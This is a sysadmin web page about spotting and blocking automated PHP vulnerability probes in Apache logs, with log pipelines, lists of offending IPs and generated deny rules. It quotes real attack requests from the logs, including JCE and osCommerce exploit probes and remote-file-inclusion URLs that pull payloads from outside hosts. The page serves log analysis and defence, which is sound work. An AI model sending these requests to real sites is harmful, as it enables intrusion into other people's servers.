Softpanorama

May the source be with you, but remember the KISS principle ;-)
Home Switchboard Unix Administration Red Hat TCP/IP Networks Neoliberalism Toxic Managers
(slightly skeptical) Educational society promoting "Back to basics" movement against IT overcomplexity and  bastardization of classic Unix

PHP probes

News Perl HTTP Logs Processing Scripts .htaccess file  AWStats Apache Webserver  HTTP Return Codes  mod rewrite
Requests for non-existing web pages Referrer Spam PHP probes Requests for crossdomain.xml and other XML files Mystery GET requests with URI scheme encoded PNG image in them Lower case requests Trailing junk in requests
Bangers Bots that cause consistent 500 errors Broken or undebugged robots Requests for crossdomain.xml and other XML files Frivolous POSTs Non-PHP Web probes  
Probes from bc.googleusercontent.com Fighting rogue robots Bots that couse consistent 500 errors Large Sample of "Composition URL" fake hits      
Apache authentication and authorization using LDAP  HTTP Protocol Cheap Web hosting with SSH access Web site monitoring Sysadmin Horror Stories Web Humor Etc

Introduction

PHP probes are dominant type of probes against web sites. Some automated probes are running against popular sites 24x7 and again and again. See also Bangers. Supposedly they try to exploit some known PHP or other vulnerabilities in popular applications but their distinctive feature is that they access the same page again and again.

Most of them perform "blind probes": they do not check if particular application or even OS is running.  Now many of them are coming from bc.googleusercontent.com  and they are more difficult to block

Application checks, if performed at all by such probes, are rudimentary such as checks for specific directories such as

Here are the most frequent PHP probes as of Jan 26, 2015:

Most frequent PHP probes
   1     952 POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4f     e1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1
   2     833 GET //index.php HTTP/1.1
   3     438 GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
   4     412 POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1
   5     338 GET /WWW/probe_is_registered.shtml?name=magic.php HTTP/1.1
   6     300 POST //index.php HTTP/1.1
   7     264 POST /pingserver.php HTTP/1.1
   8     264 GET /WWW/HTTP_log_analysis//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
   9     239 GET /wp-login.php HTTP/1.1
  10     230 POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20     &6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1
  11     230 GET /administrator/index.php HTTP/1.1
  12     225 POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=2     0 HTTP/1.1
  13     211 GET /WWW//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
  14     205 POST /viewticket.php HTTP/1.1
  15     175 GET /About/Stats//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
  16     158 GET /About//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1
  17     126 GET /admin/categories.php/login.php HTTP/1.1
  18     125 GET /Malware/Spyware/register.php?mlvl=-1 HTTP/1.1
  19     124 POST /administrator/index.php HTTP/1.1
  20     118 GET /images/stories/3xp.php HTTP/1.1
  21     109 GET /admin.php HTTP/1.1
  22     101 POST /WWW/Webservers/Apache/Modules/Mod_rewrite/viewticket.php HTTP/1.1
  23     100 POST /OFM//components/filemanager/download.php HTTP/1.1
  24     100 POST //nucleus/plugins/skinfiles/index.php HTTP/1.1
  25     100 POST //components/filemanager/download.php HTTP/1.1

I would call such tests suicidal as in most cases such IPs can (and should) be blocked automatically. But please note that respectable bots sometimes pick up such URLs and perform such probes too (this is actually testament of the stupidity of programmers of such bots ;-). MSbot is worse then other in this respect:

157.55.39.133 (    msnbot-157-55-39-133.search.msn.com) produced 1617 page hits. Of them 1064 were successful and 553 were  probes
         Most frequent page is /robots.txt : 9 hits
         Attempt to execute standard PHP scripts on arbitrary site URL = 4
         Trailing junk after .shtml=13
         HTTP Codes
                 403=20
                 500=1
                 404=532

157.55.39.123 (    msnbot-157-55-39-123.search.msn.com) produced 1437 page hits. Of them 967 were successful and 470 were  probes
         Most frequent page is /topupdates.shtml : 8 hits
         Attempt to execute standard PHP scripts on arbitrary site URLl = 4
         Trailing junk after .shtml=16
         HTTP Codes
                 403=16
                 500=1
                 404=453

207.46.13.46 (    msnbot-207-46-13-46.search.msn.com) produced 541 page hits. Of them 367 were successful and 174 were  probes
         Most frequent page is /robots.txt : 16 hits
         Attempt to execute standard PHP scripts on arbitrary site URL = 3
         Trailing junk after .shtml=7
         HTTP Codes
                 403=6
                 404=168

207.46.13.132 (    msnbot-207-46-13-132.search.msn.com) produced 444 page hits. Of them 306 were successful and 138 were  probes
         Most frequent page is /robots.txt : 49 hits
         Trailing junk after .shtml=7
         HTTP Codes
                 403=8
                 500=1
                 404=129

In case they do nothing but probes (if there are no hits with codes in 200-300 range such IPs can blocked automatically for 30 days plus the number of probes. And corresponding bots can be called kamikaze bots. 

Here is an example of automatically generated "deny" file for those pests. this approach does not work very well as some of them use IP ranges that they rotate and some used application API such Google or Amazon and corresponding IP space. Still they can save consumed bandwidth on your site and as such are useful tool. That rarely stops accesses though. so can be undated infrequently, for example on a monthly basis.  Sometimes I still see accesses after a year of blocking, so some of those bots are probably abandoned completly. That helps to clean your access logs with zero risk (if some IP scans the site with the same probe day after day in no way you need such visitors)  as those script kiddies usually are engaged in other nefarious behaviors:

[0]  # cat deny.lst
#     335 46.118.121.109     SOL-FTTB.109.121.118.46.sovam.net.ua
deny from 46.118.121.109
#     120 192.254.173.154     kat.katinval.com
deny from 192.254.173.154
#     112 213.251.182.10     gwc01.ovh.net
deny from 213.251.182.10
#      94 89.97.74.13     89-97-74-13.ip16.fastwebnet.it
deny from 89.97.74.13
#      85 213.251.182.11     gwc02.ovh.net
deny from 213.251.182.11
#      59 213.251.182.12     gwc03.ovh.net
deny from 213.251.182.12
#      49 81.169.144.135     fo-p00-ob.rzone.de
deny from 81.169.144.135 

NOTE: Most such probes assume the extension .php which suggests that it is a very bad idea to use this extension on any site for any purpose :-). Just changing it to anything else, even as trivial as .php5 stops most blind probes cold.

A small sample

Here is a small sample of sites that use "blind" PHP probes on daily basis. As you can geographic distribution of those pests is pretty wide and, contrary to some widespread hypothesis,  such pests are plentiful on all continents, although they naturally prefer areas with better connectivity ;-). Here is the list: 

523 37.187.147.6     ns321378.ip-37-187-147.eu

    480 87.106.162.42     s16978438.onlinehome-server.info

 27.254.67.156: Non-existent domain
    328 5.39.67.201     ns314501.ip-5-39-67.eu

    246 94.23.98.251     serveur02.ffbad.org

 61.154.15.54: Non-existent domain
    192 94.23.1.32     ns203882.ovh.net

 64.69.70.47: Non-existent domain
 213.215.162.250: Non-existent domain
    190 94.23.205.184     ns303343.ip-94-23-205.eu

    180 146.148.25.102     102.25.148.146.bc.googleusercontent.com

    174 77.88.191.169     ip-77-88-191-169.fn.pl

    160 188.165.255.121     sterncom.pl

    144 66.55.82.208     208.82.55.66.hosted.by.thegcloud.com

    144 46.105.74.67     vmblueice.772424.com

    144 37.187.250.73     ns340593.ip-37-187-250.eu

    144 200.13.244.118     static-epm200-13-244-118.epm.net.co

    144 193.34.134.46     web1.vengit.com

    144 193.200.86.20     php5.3rex.net

    143 162.209.58.133     ns2.avatar.gen.nz

    132 37.59.97.250     250.ip-37-59-97.eu

    130 217.160.130.166     s17669332.onlinehome-server.info

 107.170.22.23: Non-existent domain
    125 217.160.168.76     s15991209.onlinehome-server.info

    122 80.93.62.63     fox.z8.ru

    120 192.254.173.154     kat.katinval.com

    119 96.39.79.99     96-39-79-99.static.oxfr.ma.charter.com

    110 184.172.57.26     184.172.57.26-static.reverse.softlayer.com

    106 198.62.109.62     198.62.109.62-static.reverse.mnx.io

    102 119.46.28.136     119-46-28-136.static.asianet.co.th

     96 37.34.54.91     vps21482.public.cloudvps.com

     96 203.193.166.228     228.internetoffce.in

     96 203.183.81.8     server41.joeswebhosting.net

 200.11.67.86: Non-existent domain
 194.150.113.89: Non-existent domain
     96 188.138.32.29     loft4395.dedicatedpanel.com

     96 186.47.232.50     50.pichincha.andinanet.net

     96 185.19.184.134     durga.thirdeye.it

 93.183.204.25: Non-existent domain
     93 69.162.68.222     222-68-162-69.static.reverse.lstn.net

     93 212.110.177.137     212-110-177-137.no-reverse-dns-set.bytemark.co.uk

     92 184.106.178.11     184-106-178-11.static.cloud-ips.com

 208.64.227.202: Server failed
 59.58.137.95: Non-existent domain
     82 193.34.68.232     root124.alroma.de

     80 66.71.182.8     ggallery2.9netweb.it

 27.254.59.16: Non-existent domain
     78 74.208.144.91     u15325711.onlinehome-server.com

     76 176.31.252.38     ns387958.ip-176-31-252.eu

     72 115.112.174.28     wvil.fastdnsnetwork.com

     70 203.113.115.18     203-113-115-18.totisp.net

     66 94.75.249.46     vps1.webing.nl

     66 200.203.146.120     www.ifgoiano.edu.br

     62 83.143.87.232     hlb625-07.stwserver.net

     62 37.187.145.203     ns324480.ip-37-187-145.eu

     62 174.142.115.7     cpanel.airdatacenter.com

 94.138.216.195: Non-existent domain
     58 82.220.38.107     2280.hostserv.eu

     58 213.251.182.10     gwc01.ovh.net

     56 94.23.59.161     ns343956.ip-94-23-59.eu


     55 46.4.116.200     static.200.116.4.46.clients.your-server.de

 188.143.232.103: Non-existent domain
     52 46.105.100.54     ns382519.ovh.net

     51 130.211.248.170     170.248.211.130.bc.googleusercontent.com

     50 212.4.62.72     jupiter.aleo.no

     50 188.165.231.22     ns313833.ovh.net

     48 96.125.188.100     web26.hspheredns.com

     48 92.39.246.203     vps2798-cloud.dns26.com

     48 87.106.129.229     s15733918.onlinehome-server.info

     48 81.176.228.2     l19.in-solve.ru

     48 46.249.33.132     vps43.ximple.nl

     48 216.27.29.232     static.dominionhosting.com

     48 207.210.192.141     wp1.rankadvisor.net

     48 203.217.2.162     203-217-2-162.vps.iinet.net.au

     48 194.146.200.68     mail.logic-bratsk.ru

     48 192.99.13.198     sys.calivp.com

     44 109.72.36.18     6d482412.ftth.concepts.nl

     42 50.114.238.188     50-114-238-188.dc-extras.com

     40 95.173.168.127     linux5.webkur.net

 81.177.33.4: Non-existent domain
     40 80.93.23.83     vps.cultivate.ie

 184.107.231.202: Non-existent domain
     39 66.211.222.148     66-211-222-148.static.velocity.net

 58.23.232.205: Non-existent domain
 89.37.223.111: Non-existent domain
     36 96.58.253.106     96-58-253-106.res.bhn.net

     36 193.226.47.33     ns1.iren.ro

     36 192.254.75.174     s1.591hosting.com

     36 123.30.110.41     vina00032.dinodata.vn

     34 216.224.170.201     vps-1161991-22227.manage.myhosting.com

     34 212.152.181.222     mgraz1-181-222.net.uta.at

     34 202.62.155.43     cpanel.defence-officers-in-business.com

 14.147.123.1: Non-existent domain
 199.58.86.206: Non-existent domain
     32 37.187.251.74     ns343995.ip-37-187-251.eu

     32 190.61.4.74     hosting-plesk-linux.ifxnetworks.com

 175.42.93.81: Non-existent domain
 108.163.176.146: Non-existent domain

Some probes are coming from multiple IP addresses in the same C-class network, often using more then a hundred addresses in a single day.  The simplest way to get the general picture of this activity against your site is to run something like

fgrep ' "GET ' access.log | fgrep '.php?'
and then filter out "legitimate accesses", if PHP is really used on the site.  You can also analyze error log instead of access logs. 

Often such probes are just a stupid traversal of a part of website tree trying to "catch" the place where particular script is installed.  Here is one example (186.202.126.94 resolved to pleskcl0067.hospedagemdesites.ws )

186.202.126.94 - - [12/Jan/2014:21:04:36 +0000] "GET //images/stories/ViAr.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 186.202.126.94 - - [12/Jan/2014:21:04:36 +0000] "GET /Net/Netutils//images/stories/ViAr.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

186.202.126.94 - - [12/Jan/2014:21:04:36 +0000] "GET //images/stories/dash.php?clone HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

186.202.126.94 - - [12/Jan/2014:21:04:37 +0000] "GET /Net/Netutils//images/stories/dash.php?clone HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

What is strange is that it looks like they do not have any control or interest in the results, as they probe the same pages again and again.  In other words they don't care if they were detected and blocked. 

What PHP files/scripts are typically probed

An interesting information is extracting the names of the files they try to probe. Here is one sample from June 2014:

   6007 wp-login.php
   5448 index.php
   2633 food.php
   2510 login.php
   1893 ofc_upload_image.php
    852 asu.php
    419 password_forgotten.php
    331 modules.php
    306 vito.php
    252 lobex21.php
    178 timthumb.php
    157 petx.php
    144 connector.php
    137 dark.php
     96 explore.php
     91 member.php
     86 config.inc.php
     75 profile.php
     63 wawalo.php
     61 link.php
     55 flashgallery.php
     53 arhy.php
     48 footer.php
     42 register.php
     42 configure.php
     41 r3.php
     38 ucp.php
     36 logx
     36 bouncer.php
     35 bat.php
     35 ViAr.php
     34 logging.php
     33 wpinfo.php
     33 index_do.php
     32 dor.php
     31 tmp.php
     30 axis.php
     28 guys.php

Obnoxious "PHP-probers"

Most probers are not that obnoxious and run their probes just several times a day, often at night. In this case nobody cares. And you would demonstrate excessive zeal by trying to block them.  Approach like change of extension for your scripts to something other then .php works much, much better.  Even if this is  .php5 ;-).

But sometimes we need to deal with "obnoxious probers". In this case activity amounts to hundreds or thousand requests per 24 hours and that's an unpleasant experience during rush hours. Such guys need to be eliminated. 

Moreover those requests typically repeat each day as if the job is running from cron or other scheduler.  As I mentioned before most of the probes is completely meaningless and do not take into account neither the OS used, nor applications installed. In other words they are blind probes

And it looks like they are completely oblivious to the danger of complains to provider, which, if complain is properly documented, usually takes it seriously.  

You can easily get the list of the most obnoxious "PHP-probers" using a pipe such as:

fgrep ' "GET ' access.log | fgrep '.php?' | cut -d ' ' -f 1 | sort | uniq -c | sort -rn | head -25

Here is one of more recent results (June 8, 2014). I post processed the results via a simple Perl script which added DNS names to make the list more informative:

593 213.251.187.189 server.lbconseil.net.
465 185.21.133.101 siax.mysitehosted.com.
422 193.254.190.142 ostseedesign.de.
381 23.251.155.109 109.155.251.23.bc.googleusercontent.com.
369 108.59.80.43 43.80.59.108.bc.googleusercontent.com.
362 64.20.53.26 webhosting800.interserver.net.
362 173.255.119.147 147.119.255.173.bc.googleusercontent.com.
355 107.178.220.26 26.220.178.107.bc.googleusercontent.com.
338 107.178.210.93 93.210.178.107.bc.googleusercontent.com.
319 23.251.153.250 250.153.251.23.bc.googleusercontent.com.
288 91.200.12.4 dedic345.hidehost.net.
288 82.94.254.50 nlspider0.wise-guys.nl.
255 196.203.83.3
233 88.198.25.130 static.88-198-25-130.clients.your-server.de.
232 62.75.230.62 server9.bluelilies.de.
228 110.89.49.0 0.49.89.110.broad.pt.fj.dynamic.163data.com.cn.
225 31.223.168.21 plesk01.supportplushosting.nl.
181 138.91.117.220
165 86.125.62.27 static-86-125-62-27.rdsnet.ro.
154 173.9.123.253 173-9-123-253-NewEngland.hfc.comcastbusiness.net.
141 187.45.210.67 plesk44.hospedagemdesites.ws.
133 183.207.228.11
129 146.148.19.187 187.19.148.146.bc.googleusercontent.com.
126 50.87.41.35 50-87-41-35.unifiedlayer.com.
119 188.165.232.149 ks313690.kimsufi.com.
117 110.89.63.161 161.63.89.110.broad.pt.fj.dynamic.163data.com.cn.
114 27.159.217.136 136.217.159.27.broad.xm.fj.dynamic.163data.com.cn.
114 120.40.157.153
111 176.31.117.8 ns394875.ovh.net.
108 146.148.2.237 237.2.148.146.bc.googleusercontent.com.
105 146.148.23.9 9.23.148.146.bc.googleusercontent.com.
98 208.109.88.169 ip-208-109-88-169.ip.secureserver.net.
77 117.25.32.38 38.32.25.117.broad.fz.fj.dynamic.163data.com.cn.
75 97.74.144.154 p3nlhssl011.shr.prod.phx3.secureserver.net.
74 93.180.68.68 firewall.vhosting.pcextreme.nl.
71 198.20.242.191 bay.bayareawebsolutions.com.
70 94.23.1.82 ns365008.ovh.net.
63 187.45.210.68 plesk45.hospedagemdesites.ws.
62 72.167.177.244 ip-72-167-177-244.ip.secureserver.net.
60 37.59.7.157 ns3099930.ip-37-59-7.eu.
60 200.251.23.19
58 199.180.135.212
57 31.184.241.12
56 89.16.174.114 lmno-lily.vm.bytemark.co.uk.
56 87.238.192.70 sh2070.evanzo-server.de.
56 176.53.23.44 176-53-23-44.turkrdns.com.
54 77.222.40.213 vh127.sweb.ru.
54 193.136.230.22 paloma.isr.uc.pt.
53 188.165.253.17 ns215388.ovh.net.
52 91.191.149.103 srv1398.sd-france.net.
52 41.79.226.106
52 184.168.152.142 p3nlhg583.shr.prod.phx3.secureserver.net.
51 91.121.210.73 dartagnan.produ-net.com.
50 59.148.239.94 059148239094.ctinets.com.
50 211.234.100.76
48 202.228.204.204 204.joes-net.204.228.202.in-addr.arpa.
48 116.235.224.152
45 89.108.117.145 unknown-538.agava.net.
44 91.121.8.150 ks22860.kimsufi.com.
44 74.122.192.102 server1.musthost.com.br.
44 198.7.63.140
44 188.143.232.103
43 14.147.73.105
42 89.32.226.133 89-32-226-133.sta.cts.md.
42 74.55.73.74 server.cepublishing.com.
42 192.99.152.11 11.ip-192-99-152.net.
42 119.145.148.221
40 194.186.45.237 ds6.centre.ru.
40 162.244.10.165
39 94.124.88.234 nav2.nl.
38 76.74.253.110 web2.wsiph2.com.
38 189.1.168.128 data.server2acerolaidc.com.br.
38 103.243.239.226
37 175.42.63.13
36 91.149.157.133 vh16.hosterby.com.
36 77.222.40.208 vh136.sweb.ru.
36 61.147.103.21
36 5.9.80.73 server1.ota.ro.
36 192.241.210.154 linuxserver.websitesoftware2go.com.
34 94.23.27.208 ns205414.ip-94-23-27.eu.
34 87.119.200.21 v-10123.intertech.de.
34 85.214.206.237 h1829061.stratoserver.net.
34 198.50.99.162 ridlav.hostba.com.br.
33 200.29.228.19
32 94.23.199.199 ns207109.ovh.net.
32 86.109.170.163 linux45.dnsprimario.com.
32 81.169.153.214 h2131264.stratoserver.net.
32 69.28.92.160
32 46.227.4.82
32 213.195.94.106 static.106.94.195.213.ibercom.com.
32 188.226.242.106
32 182.114.229.252
31 85.214.210.202 h1883227.stratoserver.net.
31 120.37.210.145 145.210.37.120.broad.pt.fj.dynamic.163data.com.cn.
30 85.214.76.52 h2295245.stratoserver.net.
30 218.5.20.123 123.20.5.218.broad.fz.fj.dynamic.163data.com.cn.
30 195.210.47.14 mail.agrg.kz.
30 194.169.191.59 unassigned.ulbsibiu.ro.
30 162.244.9.13
29 202.29.42.100
28 94.23.234.215 ns307981.ovh.net.
28 46.37.21.116 host116-21-37-46.serverdedicati.aruba.it.
28 173.201.196.130 p3nlhg326.shr.prod.phx3.secureserver.net.
27 82.98.136.40 d272.dinaserver.com.
27 54.73.88.211 ec2-54-73-88-211.eu-west-1.compute.amazonaws.com.
27 205.251.134.98 rs17.abstractdns.com.
27 188.132.153.86 static-86-153-132-188.zero.net.tr.
27 185.19.92.163 host-185-19-92-163.ttnetdc.com.
26 91.192.192.63 ns.linux3.cwcs.co.uk.
26 74.63.237.29 linux.elixirimc.com.
26 216.107.155.114 s2.960.clients.serverdeals.org.
26 190.242.131.3
26 184.168.193.181 p3nlhg501.shr.prod.phx3.secureserver.net.
26 162.244.13.99
26 162.210.196.97 hosted-by.leaseweb.com.
26 109.206.166.30 109.206.166.30.serverel.net.
25 192.95.11.128
24 82.103.128.215 egan.ingent.net.
24 77.222.42.202 vh199.sweb.ru.
24 66.55.88.21 server1.cloudwebhost.net.
24 58.206.126.20
24 46.105.105.217 diesel.on-rev.com.
24 31.210.43.2 mail.goldticaret.com.
24 216.250.115.188 u16863852.onlinehome-server.com.
24 199.192.207.146 s1.960.clients.serverdeals.org.
23 190.107.68.150 www.farmaciasmedicity.com.
23 185.28.22.209
23 117.26.201.35 35.201.26.117.broad.pt.fj.dynamic.163data.com.cn.
22 97.74.144.106 p3nlh106.shr.prod.phx3.secureserver.net.
22 85.143.97.147 sweb3.mgsu.ru.
22 77.72.149.86 s2.dejongtrading.nl.
22 62.210.114.86 62-210-114-86.rev.poneytelecom.eu.
22 5.249.163.207 dhcp-5-249-163-207.cust.vpntunnel.se.
22 185.26.122.28 serv28-26.hostland.ru.
22 162.244.11.227
21 91.236.75.87
21 83.149.126.98
21 81.169.162.44 h2290912.stratoserver.net.
21 216.70.68.217 reformedbookservices.ca.
21 162.244.10.69
21 110.86.185.105 105.185.86.110.broad.pt.fj.dynamic.163data.com.cn.

Using a simple script it is easy to generate deny list from it:

deny from 213.251.187.189
deny from 185.21.133.101
deny from 193.254.190.142
deny from 23.251.155.109
deny from 108.59.80.43
deny from 64.20.53.26
deny from 173.255.119.147
deny from 107.178.220.26
deny from 107.178.210.93
deny from 23.251.153.250
deny from 91.200.12.4
deny from 82.94.254.50
deny from 196.203.83.3
deny from 88.198.25.130
deny from 62.75.230.62
deny from 110.89.49.0
deny from 31.223.168.21
deny from 138.91.117.220
deny from 86.125.62.27
deny from 173.9.123.253
deny from 187.45.210.67
deny from 183.207.228.11
deny from 146.148.19.187
... ... ...

High number of probes usually signify attempts to traverse the web site tree

High number of probes does not mean that those guys are more dangerous. In the contrary they are typically less dangerous that whose who make a couple well targeted probes. Most often high number of probes is connected with some king of attempt to "traverse" your site Web tree,  trying to guess places where particular script can be installed: 

$ grep 186.202.126.94 access.log | head
186.202.126.94 - - [12/Jan/2014:20:33:21 +0000] "POST /Net/Netutils/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:21 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:21 +0000] "POST /Net/Netutils/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:21 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:22 +0000] "POST /Net/Netutils/nmap.shtml/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:22 +0000] "GET /Net/Netutils//images/stories/ViAr.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:21 +0000] "POST /Net/Netutils/nmap.shtml/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:22 +0000] "GET /Net/Netutils/nmap.shtml//images/stories/ViAr.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:22 +0000] "GET //images/stories/ViAr.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:22 +0000] "GET /Net/Netutils//images/stories/dash.php?clone HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:23 +0000] "GET /Net/Netutils/nmap.shtml//images/stories/dash.php?clone HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:23 +0000] "GET //images/stories/dash.php?clone HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
186.202.126.94 - - [12/Jan/2014:20:33:39 +0000] "POST /Net/Netutils/nmap.shtml/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
186.202.126.94 - - [12/Jan/2014:20:33:39 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
... ... ...

Here is another, less typical, sample (just the files they are trying to access and parameters used are supposed to be located in few predetermined locations):

///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/allnet.jpg??
///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/byroe.jpg??
///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j1.txt??
///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j2.txt??
///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j3.txt??
///vwar/backup/errors.php?error=test??
//admin/categories.php/login.php?cPath=&action=new_product_preview
//wp-content/themes/MyApp/timthumb.php?src=http://wordpress.com.suppaddleboard.com/eva.php
/Access_control/admin/categories.php/login.php?cPath=&action=new_product_preview
/Admin/tips.shtml//wp-content/themes/MyApp/timthumb.php?src=http://wordpress.com.suppaddleboard.com/eva.php
/DB//admin/categories.php/login.php?cPath=&action=new_product_preview
/Lang/admin/categories.php/login.php?cPath=&action=new_product_preview
/Lang/java.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview
/WWW///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/allnet.jpg??
/WWW///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/byroe.jpg??
/WWW///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j1.txt??
/WWW///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j2.txt??
/WWW///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j3.txt??
/WWW///vwar/backup/errors.php?error=test??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/allnet.jpg??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/byroe.jpg??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j1.txt??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j2.txt??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=http://www.gyermekrak.hu/modules/FAQ/j3.txt??
/WWW/web_logs_analysis.shtml%22%20class=%22resultLink///vwar/backup/errors.php?error=test??
/Windows/admin/categories.php/login.php?cPath=&action=new_product_preview
/Windows/filesystems_recovery.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/categories.php/login.php?cPath=&action=new_product_preview

Here is one very popular probe:

 112 /admin/categories.php/login.php?cPath=&action=new_product_preview
And you can easily find "lovers" of /admin/ directory on the server. For example: 
fgrep '/admin/' http_logs120906_1518.txt | cut -d ' ' -f 1 | sort | uniq -c | sort -rn
    186 91.121.89.20
     86 108.61.40.182
     82 200.98.68.11
     48 209.190.37.213
     36 103.9.101.121
     32 200.98.71.217
     20 46.182.3.24

Blocking using sliding scale

I have found that sliding scale of blocking is pretty efficient against those  Obnoxious "PHP-probers". the only important thing here is to remember principle "Not too much zeal". If number of probes is such that it does not  slow your web site generally you should not care much.

But if they are really "intense" you should first you block them for 90 days. Then unlock and if they continue this activity (and that mean they forgot to disable the script, despite the fact that all requests were rejected for 90 days ;-) block for 180 days, then 360 days and do on. As the number of "recidivists" is typically small and those are often the most obnoxious this allow not to clutter your deny section with IPs that already stopped their activities and keep it  small and efficient. 

Set a threshold after which gets get into the deny list (for example 100 or more probes an hour for any "rush hour"). You do not need to pay attention about smaller fish.  You also can monitor only those who operate during "rush hours", say from 7AM till 4PM because not all junk probes are created equal :-). At night few people access you web site so generally I assume that those guys can exercise their skills without doing any damage ;-) 

Generation of deny section from log analysis is easily scriptable in Perl. Weeding out records with expired TTL is also no-brainer, if you initially put the last day the probe should be active in comment, for example:

# 180 20140111 PHP probes
deny from 186.202.126.94
# 90 20140111 PHP probes
deny from 72.249.76.2
# 90 20140111 PHP probes
deny from 91.121.158.124
# 90 20140111 PHP probes
deny from 162.243.137.119
# 90 20140111 PHP probes
deny from 162.243.137.119
I recently switched to using a   special include file with deny statements in order not to clog the .access file.

In comments that are generated above each deny report the first digit is TTL and the second is the date of insertion of the record. 

